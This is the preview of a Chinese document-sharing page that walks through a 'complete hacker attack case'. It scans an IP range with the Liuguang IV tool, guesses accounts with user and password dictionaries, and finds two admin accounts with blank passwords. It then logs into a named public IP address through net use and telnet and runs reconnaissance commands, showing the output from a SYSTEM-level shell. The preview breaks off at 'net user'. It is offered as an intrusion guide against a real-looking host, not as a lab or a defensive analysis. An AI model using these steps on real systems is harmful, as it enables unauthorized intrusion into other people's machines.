黑客攻击完整案例
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
黑客完整攻击案例介绍
1.扫描主机发现漏洞
我们用流光IV来扫描一段网址!
点击探测-高级扫描工具!
输入ip地址范围如下图所示
扫描IP地址范围
▪起始地址/结束地址:需要扫描的IP地址范围。
▪目标系统:ALL-所有系统 NT-NT/2000系统 UNIX-UNIX系统,根据选择的不同下面的[检测项目]将会有不同设置。
▪获取主机名:获取主机的名称。
▪检测项目:选择需要扫描的项目,根据选择的不同表单会有所不同。
高级扫描设置
如图3所示你可以自己定义你的用户字典和密码字典。
•猜解用户名字典:设置扫描中采用的用户字典,适用于POP3/FTP/IMAP/SQL/MYSQL。
•猜解密码字典:设置扫描中采用的密码字典,适用于POP3/FTP/IMAP/SQL/MYSQL。
•保存扫描报告:扫描的报告,采用HTML格式。
•并发线程数目:默认80,可以根据情况增减,如果线程数目越大速度越快但是越容易误报和漏报。
•网络选项:设置TCP参数
大概需要20分钟左右扫描结束,扫描结果如下图所示
总之我们得到了两个admin的帐号!mf和lyl密码都是空!
2.使用命令入侵有漏洞主机
我们点击开始运行-输入cmd单击确定
我们在命令提示符下使用net use命令远程连接主机210.192.111.207
如下图所示:
常用的网络入侵命令
这里端口78是黑客自己改的!默认端口是99
如下所示:
TELNET登录到远程主机
我们已经成功登陆到主机210.192.111.207,权限是system 运用网络命令获取远程主机的信息如下图所示
网络命令获取远程主机信息我们首先在名利提示符下输入:
net name
显示那台主机的名字
在输入:ipconfig
看看他的网络配置,有两块网卡一个是内部:192.168.1.4 一个是外部的:210.192.111.207 输入:ver
对方主机显示:
C:\WINNT\system32>ver
Microsoft Windows 2000 [Version 5.00.2195]
C:\WINNT\system32>
C:\WINNT\system32>net start
已经启动以下 Windows 2000 服务:
Alerter
Application Management
COM+ Event System
Computer Browser
DHCP Client
Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Distributed Transaction Coordinator
DNS Client
Event Log
File Replication Service
FTP Publishing Service
IIS Admin Service
Indexing Service
Intersite Messaging
IPSEC Policy Agent
Kerberos Key Distribution Center
Logical Disk Manager
Messenger
Microsoft Search
Microsoft SMTP Service
MSSQLServer
Net Logon
Network Connections
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry Service
Removable Storage
RunAs Service
Security Accounts Manager
Server
SQLServerAgent
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Windows Management Instrumentation Driver Extensions Windows Time
Workstation
World Wide Web Publishing Service
许可协议登录服务
命令成功完成。
C:\WINNT\system32>
C:\WINNT\system32>net start telnet
Telnet 服务正在启动 .
Telnet 服务已经启动成功。
C:\WINNT\system32>
C:\WINNT\system32>
C:\WINNT\system32>
C:\WINNT\system32>net user